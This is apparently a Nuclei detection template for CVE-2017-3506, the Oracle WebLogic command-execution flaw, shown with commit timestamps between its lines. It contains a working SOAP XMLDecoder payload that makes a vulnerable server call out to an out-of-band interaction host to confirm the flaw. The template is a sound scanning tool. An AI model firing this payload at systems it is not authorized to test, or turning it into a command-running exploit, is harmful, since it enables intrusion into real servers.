2021-04-26 09:48:57 +00:00
id : CVE-2017-3506
info :
2021-04-26 09:50:04 +00:00
name : Oracle Weblogic Remote OS Command Execution
2021-04-26 09:48:57 +00:00
author : pdteam
description : Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
severity : high
2021-10-18 20:40:26 +00:00
tags : cve,cve2017,weblogic,oracle,rce,oast
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://hackerone.com/reports/810778
- https://nvd.nist.gov/vuln/detail/CVE-2017-3506
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score : 7.40
cve-id : CVE-2017-3506
2021-04-26 09:48:57 +00:00
requests :
- raw :
- |
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host : {{Hostname}}
Content-Type : text/xml
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
Content-Type : text/xml;charset=UTF-8
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
2021-05-02 13:21:04 +00:00
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://{{interactsh-url}}</string>
</void>
<void idref="url">
<void id="stream" method ="openStream"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
2021-04-26 09:48:57 +00:00
matchers :
- type : word
2021-07-03 19:11:57 +00:00
part : interactsh_protocol # Confirms the HTTP Interaction
2021-04-26 09:48:57 +00:00
words :
2021-07-03 19:11:57 +00:00
- "http"
